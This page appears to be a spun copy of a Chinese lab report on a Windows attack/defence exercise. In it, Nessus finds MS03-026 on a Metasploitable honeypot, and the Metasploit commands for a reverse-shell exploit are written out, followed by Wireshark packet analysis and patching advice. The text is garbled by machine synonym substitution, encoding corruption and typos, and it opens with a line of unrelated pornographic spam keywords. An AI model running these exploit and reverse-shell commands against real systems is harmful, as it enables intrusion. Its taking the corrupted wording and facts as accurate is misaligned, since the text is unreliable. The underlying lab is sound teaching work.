国产精品香蕉在线观看网,亚洲欧美精品综合在线观看,亚洲不卡av一区二区无码不卡,亚洲日本精品国产第一区二区

移動(dòng)安全 安全管理 應(yīng)用案例 網(wǎng)絡(luò)威脅系統(tǒng)安全 應(yīng)用安全 數(shù)據(jù)安全 云安全
當(dāng)前位置: 主頁 > 信息安全 > 系統(tǒng)安全 >

系統(tǒng)安然:Windows攻防匹敵實(shí)踐

時(shí)間:2013-05-11 09:33來源:TuZhiJiaMi企業(yè)信息安全專家 點(diǎn)擊:
在本次攻防實(shí)踐中,報(bào)復(fù)打擊方利用Nessus掃描軟件發(fā)現(xiàn)到方針主機(jī)的特定收集辦事縫隙,并利用Metasploit軟件倡議報(bào)復(fù)打擊;防御方架設(shè)蜜罐, 并利用WireShark軟件捕獲并闡發(fā)針對(duì)蜜罐主機(jī)的掃描
Tags系統(tǒng)安全(735)Windows攻防(1)掃描軟件(1)  

  在本次攻防實(shí)踐中,報(bào)復(fù)打擊方利用Nessus掃描軟件發(fā)現(xiàn)到方針主機(jī)的特定收集辦事縫隙,并利用Metasploit軟件倡議報(bào)復(fù)打擊;防御方架設(shè)蜜罐, 并利用WireShark軟件捕獲并闡發(fā)針對(duì)蜜罐主機(jī)的掃描和報(bào)復(fù)打擊流量。以下給出攻防實(shí)踐陳述,分嘗試環(huán)境、掃描過程、報(bào)復(fù)打擊過程、縫隙修復(fù)與報(bào)復(fù)打擊防備四個(gè) 部門別離介紹。

  嘗試環(huán)境

  在本次攻防實(shí)踐中,報(bào)復(fù)打擊方和防御方各利用一臺(tái)宿主機(jī)。報(bào)復(fù)打擊方利用宿主機(jī)中的一臺(tái)VMware虛擬機(jī)向防御方宿主機(jī)中的一臺(tái)VMware虛擬機(jī)倡議探測(cè)和報(bào)復(fù)打擊。

  本次攻防實(shí)踐基于真實(shí)收集環(huán)境,收集拓?fù)湟韵聢D所示,報(bào)復(fù)打擊方宿主機(jī)位于紫荊公寓,IP地址為59.66.207.31。此中的VMware虛擬機(jī)使 用課程FTP上供給的WinXP Attacker鏡像,并利用橋接編制與宿主機(jī)連接,其IP地址為59.66.207.91。防御方位于FIT大年夜樓,IP地址為 166.111.132.216。此中的VMware虛擬機(jī)利用課程FTP上供給的Win2KS Metasploitable鏡像,并利用橋接編制與宿主機(jī)連接,其IP地址為166.111.132.232。

\

  圖1 嘗試環(huán)境拓?fù)?/P>

  WinXP Attacker利用Nessum軟件掃描Win2KS Metasploitable,在獲得縫隙后,在Metasploit報(bào)復(fù)打擊框架中尋覓到響應(yīng)縫隙的報(bào)復(fù)打擊模塊策動(dòng)報(bào)復(fù)打擊。防御方在宿主機(jī)上安裝有 WireShark軟件,因?yàn)樗谐3in2KS Metasploitable的流量都顛末防御方宿主機(jī)的物理網(wǎng)卡,所以可利用宿主機(jī)上的WireShark軟件監(jiān)聽到常常Win2KS Metasploitable的流量??梢杂X得Win2KS Metasploitable是防御方設(shè)置的蜜罐,而防御方本身利用WireShark作為一個(gè)簡(jiǎn)單的蜜罐網(wǎng)關(guān),一旦WinXP Attacker對(duì)Win2KS Metasploitable進(jìn)行掃描或報(bào)復(fù)打擊,防御方宿主機(jī)就可以夠捕獲報(bào)復(fù)打擊流量并進(jìn)行闡發(fā)。

  掃描過程

  報(bào)復(fù)打擊方利用WinXP Attacker中的Nessus掃描軟件對(duì)防御方網(wǎng)段進(jìn)行掃描,并發(fā)現(xiàn)了蜜罐主機(jī)的存在。Nessus軟件除掃描對(duì)端主機(jī)開放的端口和辦事外,還可以選擇大年夜量的插件,來實(shí)現(xiàn)對(duì)把持系統(tǒng)或軟件所供給的收集辦事中縫隙的掃描。

  報(bào)復(fù)打擊方起首利用默許的建設(shè)對(duì)蜜罐進(jìn)行掃描,并獲得了掃描成果陳述。圖2顯示的是掃描成果的概要,我們可以看出全部掃描時(shí)候延續(xù)了大年夜約3分鐘,被掃描 主機(jī)開放了69各端口,并存在大年夜量的不服安身分。Nessus將其按危險(xiǎn)水等分為High、Medium和Low三類,可以發(fā)現(xiàn)該蜜罐主機(jī)有30個(gè)極其危 險(xiǎn)的安然縫隙存在。別的還能獲得被掃描主機(jī)的把持系統(tǒng)、域名、本地賬戶口令相干的一些信息。

\

  圖2 默許建設(shè)的掃描成果

  分類為High的縫隙大年夜部門都有MS安然縫隙編號(hào),包 括:MS01-026,MS01-044,MS02-045,MS03-026,MS03-039,MS03-043,MS04-007,MS04-011,MS04-012,MS04-022,MS04-035,MS04-036,MS05-027,MS05-039,MS05-043,MS05-047,MS05-051,MS06-018,MS06-035,MS06-040,MS07-065,MS08-065,MS09-001,MS09-039,MS10-025。

  為了簡(jiǎn)化嘗試過程,本次攻防實(shí)踐中只針對(duì)windows所供給的收集辦事中的一個(gè)縫隙MS03-026進(jìn)行。如圖3所示,這是微軟2003年發(fā)布 的一個(gè)縫隙,可以操縱長(zhǎng)途過程調(diào)用(Remote Procedure Call,RPC)的接口(具體位于RemoteActivation()函數(shù))進(jìn)行緩沖區(qū)溢出報(bào)復(fù)打擊。

\

  圖3 掃描成果中顯示的MS03-026縫隙

  我們?cè)贜essus軟件中建設(shè)插件,使其只針對(duì)特定的縫隙進(jìn)行掃描。如圖4所示,我們?cè)贜essus插件列表中找到windows: Microsoft Bulletins,即微軟發(fā)布的縫隙列表。進(jìn)進(jìn)該列表中我們就可以夠選定MS03-026。

  之掉隊(duì)犯方對(duì)蜜罐主機(jī)倡議掃描,在掃描成果中顯示蜜罐主機(jī)存在MS03-026縫隙,如圖5所示。

\

  圖5 Nessus掃描成果中顯示的MS03-026縫隙

  在此次掃描過程中,防御方宿主機(jī)開啟了WireShark,并記實(shí)下了掃描的過程。該過程分為兩個(gè)部門,別離是端口掃描,和針對(duì)MS03-026 縫隙的掃描。在端口掃描部門,WireShark顯示出大年夜量從59.66.207.91(即WinXP Attacker)發(fā)往166.111.132.232即(Win2KS Metasploitable)各個(gè)端口的[SYN]報(bào)文,同時(shí)可以或許發(fā)現(xiàn)Win2KS Metasploitable的回應(yīng)[SYN, ACK]或[RST, ACK]報(bào)文。

  在MS03-026縫隙掃描部門,WinXP Attacker向Win2KS Metasploitable的135、139和445等端口發(fā)送了大年夜量request文。

  報(bào)復(fù)打擊過程

  報(bào)復(fù)打擊方利用WinXP Attacker中的Metasploit軟件倡議報(bào)復(fù)打擊。Metasploit的建設(shè)過程如圖6所示,起首選擇針對(duì)MS03-026的縫隙報(bào)復(fù)打擊模塊,該模 塊屬于針對(duì)RPC的報(bào)復(fù)打擊,利用號(hào)令exploit/windows/dcerpc/ms03_26_dcom;接下來選擇PAYLOAD,利用號(hào)令set PAYLOAD generic/shell_reverse_tcp;再別離設(shè)置本地主機(jī)和長(zhǎng)途主機(jī),利用號(hào)令set LHOST 59.66.207.91和set RHOST 166.111.132.232。最后利用號(hào)令exploit倡議報(bào)復(fù)打擊并獲得了長(zhǎng)途主機(jī),即Win2KS Metasploitable的節(jié)制權(quán)。

\

  圖6 Metasploit建設(shè)過程

  在此次報(bào)復(fù)打擊過程中,防御方宿主機(jī)仍然開啟WireShark,并記實(shí)下了報(bào)復(fù)打擊的過程。WireShark顯示報(bào)復(fù)打擊來自59.66.207.91(即 WinXP Attacker),方針為166.111.132.232即(Win2KS Metasploitable),而全部報(bào)復(fù)打擊過程兩邊來回的報(bào)文只有20個(gè),我們?cè)诖司唧w闡發(fā)一下這個(gè)過程。

   前5個(gè)數(shù)據(jù)包:WinXP Attacker利用7937端口向Win2KS Metasploitable的135端口倡議TCP連接和bind要求;

   第6-8個(gè)數(shù)據(jù)包:應(yīng)當(dāng)就是WinXP Attacker利用已成立的連接向Win2KS Metasploitable發(fā)送shellcode,經(jīng)由過程后者的縫隙造成緩沖區(qū)溢出,在其4444端口上綁定了一個(gè)shell;

   第9-12個(gè)數(shù)據(jù)包:Win2KS Metasploitable利用4444端口向WinXP Attacker的1049端口倡議反向TCP連接;

   第13-16個(gè)數(shù)據(jù)包:兩邊裁撤了基于135端口成立的TCP連接;

   第17-20個(gè)數(shù)據(jù)包:Win2KS Metasploitable向WinXP Attacker發(fā)送[PSH ACK]數(shù)據(jù)包,在本地履行cmd.exe并經(jīng)由過程之前的連接回傳,此時(shí)報(bào)復(fù)打擊者已能肆意拜候長(zhǎng)途資本。

  別的我們還針對(duì)Win2KS Metasploitable的其他幾個(gè)縫隙倡議了報(bào)復(fù)打擊,成功的包含MS01-026和MS06-040,別離利用exploit/windows /iis/ms01-026和exploit/windows/smb/ms06-040報(bào)復(fù)打擊模塊。以下是Metasploit節(jié)制臺(tái)報(bào)復(fù)打擊過程截圖:

  縫隙修復(fù)與報(bào)復(fù)打擊防備

  一旦體味了報(bào)復(fù)打擊者所操縱的縫隙,起首應(yīng)尋覓修復(fù)的編制。微軟供給了安然縫隙通知布告與補(bǔ)丁下載的網(wǎng)站http://www.microsoft.com/technet/security/current.aspx。下圖是微軟對(duì)本次嘗試操縱的MS03-026縫隙的描述。

\

  圖8 微軟發(fā)布的MS03-26縫隙通知布告及補(bǔ)丁下載頁面

  對(duì)防御Windows收集辦事長(zhǎng)途滲入報(bào)復(fù)打擊的編制,首要的是盡快為把持系統(tǒng)與軟件更新安然補(bǔ)丁,同時(shí)可以操縱縫隙掃描軟件來發(fā)現(xiàn)縫隙的存在并及時(shí) 修補(bǔ)。別的,報(bào)復(fù)打擊者會(huì)操縱一些開放的端話柄施縫隙掃描(如掃描MS03-026縫隙時(shí)拜候的135,139和445等端口),是以開啟防火墻避免相干端口 的拜候也將是防御長(zhǎng)途報(bào)復(fù)打擊的有效編制

------分隔線----------------------------

推薦內(nèi)容